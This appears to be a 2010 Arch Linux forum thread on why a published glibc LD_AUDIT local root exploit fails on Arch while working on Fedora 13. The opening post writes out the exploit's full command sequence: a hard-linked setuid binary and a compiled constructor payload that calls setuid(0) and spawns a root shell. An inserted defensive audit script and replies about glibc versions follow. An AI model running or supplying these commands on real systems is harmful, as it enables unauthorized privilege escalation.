#1 2010-10-20 07:55:30

sonoran
Member
From: sonoran desert
Registered: 2009-01-12
Posts: 192

Why doesn't exploit work in Arch?

Can anyone explain why this exploit does not work in Arch? http://www.exploit-db.com/exploits/15274/

It does indeed give you root privilege in Fedora 13, but when I try it in Arch both the gnome-terminal and xterm windows simply disappear after entering the last command.

cd /tmp
mkdir /tmp/exploit
ln /bin/ping /tmp/exploit/target
exec 3< /tmp/exploit/target
rm -rf /tmp/exploit/
echo 'void __attribute__((constructor)) init(){setuid(0);system("/bin/bash");}' > payload.c
gcc -w -fPIC -shared -o /tmp/exploit payload.c
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3

Offline
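
Added example, not part of the original thread or the linked advisory: the commands in the post above begin by hard-linking /bin/ping (setuid root on distributions of that time) into a directory under /tmp, which only works when both paths are on one filesystem. This shell sketch audits a system for that precondition and for setuid files that carry extra hard links; the function names are invented here, `stat -c` assumes GNU coreutils, and fs.protected_hardlinks assumes Linux 3.6 or later.

```shell
#!/bin/sh
# Added example (constructed; function names are hypothetical).

# List setuid regular files under DIR that have more than one hard link,
# one per line as "<link count> <device>:<inode> <path>".
suid_multilink() {
    find "$1" -xdev -type f -perm -4000 -links +1 \
        -exec stat -c '%h %d:%i %n' {} + 2>/dev/null
}

# True when both paths are on the same filesystem (same device number),
# the precondition for creating a hard link from one to the other.
same_fs() {
    [ "$(stat -c %d "$1")" = "$(stat -c %d "$2")" ]
}

# Kernel hard-link restriction: 1 = enforced, 0 = off, "unknown" when the
# sysctl is absent (assumes Linux 3.6+ for fs.protected_hardlinks).
hardlink_policy() {
    cat /proc/sys/fs/protected_hardlinks 2>/dev/null || echo unknown
}

# Report the policy, scratch directories sharing a filesystem with the
# system binary directories, and multiply-linked setuid files in them.
audit() {
    echo "fs.protected_hardlinks: $(hardlink_policy)"
    for scratch in /tmp /var/tmp; do
        [ -d "$scratch" ] || continue
        for bindir in /bin /usr/bin; do
            if [ -d "$bindir" ] && same_fs "$bindir" "$scratch"; then
                echo "WARN: $scratch is on the same filesystem as $bindir"
            fi
        done
        suid_multilink "$scratch"
    done
}

# Run the audit only when asked, so the file can also be sourced.
if [ "${1:-}" = "--audit" ]; then audit; fi
```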

#2 2010-10-20 09:39:29

badboy
Member
Registered: 2009-01-02
Posts: 32

Re: Why doesn't exploit work in Arch?

If you first exec a new shell or just use one of the vtys, you get: "Inconsistency detected by ld.so: dl-open.c: 232: dl_open_worker: Assertion `(call_map)->l_name[0] == '\0'' failed!"

Other versions are probably affected, possibly via different vectors. I'm aware
several versions of ld.so in common use hit an assertion in dl_open_worker, I
do not know if it's possible to avoid this.

Is it clear now?

Offline

#3 2010-10-20 10:56:07

sonoran
Member
From: sonoran desert
Registered: 2009-01-12
Posts: 192

Re: Why doesn't exploit work in Arch?

Thanks for the reply, I hadn't thought to try it in a vty. I was a bit astonished when my terminal windows vanished, and nothing in the logs.

Offline

#4 2010-10-20 11:12:29

wonder
Developer
From: Bucharest, Romania
Registered: 2006-07-05
Posts: 5,941
Website

Re: Why doesn't exploit work in Arch?

I think it is because we have a glibc that is not affected by this. It is a snapshot since 20101007.


Give what you have. To someone, it may be better than you dare to think.

Offline

#5 2010-10-20 11:21:02

Allan
Pacman
From: Brisbane, AU
Registered: 2007-06-09
Posts: 11,400
Website

Re: Why doesn't exploit work in Arch?

wonder wrote:

I think it is because we have a glibc that is not affected by this. It is a snapshot since 20101007.

Really? What an awesome glibc maintainer we must have! :P

Offline

#6 2010-10-20 11:57:19

sonoran
Member
From: sonoran desert
Registered: 2009-01-12
Posts: 192

Re: Why doesn't exploit work in Arch?

So Allan didn't break it after all? ;)

While certain distros-that-will-be-nameless scramble to fix it (http://koji.fedoraproject.org/koji/buil … dID=201079), Arch sails securely on...

Offline

#7 2010-10-20 12:14:09

Allan
Pacman
From: Brisbane, AU
Registered: 2007-06-09
Posts: 11,400
Website

Re: Why doesn't exploit work in Arch?

Well... we do not actually have the fix Fedora are busy pushing.

So I am really not sure why it does not work. Maybe one of the other patches I used breaks it?

Offline

#8 2010-10-20 12:45:39

lolilolicon
Member
Registered: 2009-03-05
Posts: 1,722

Re: Why doesn't exploit work in Arch?

...So Allan somehow broke it after all?


This silver ladybug at line 28...

Offline
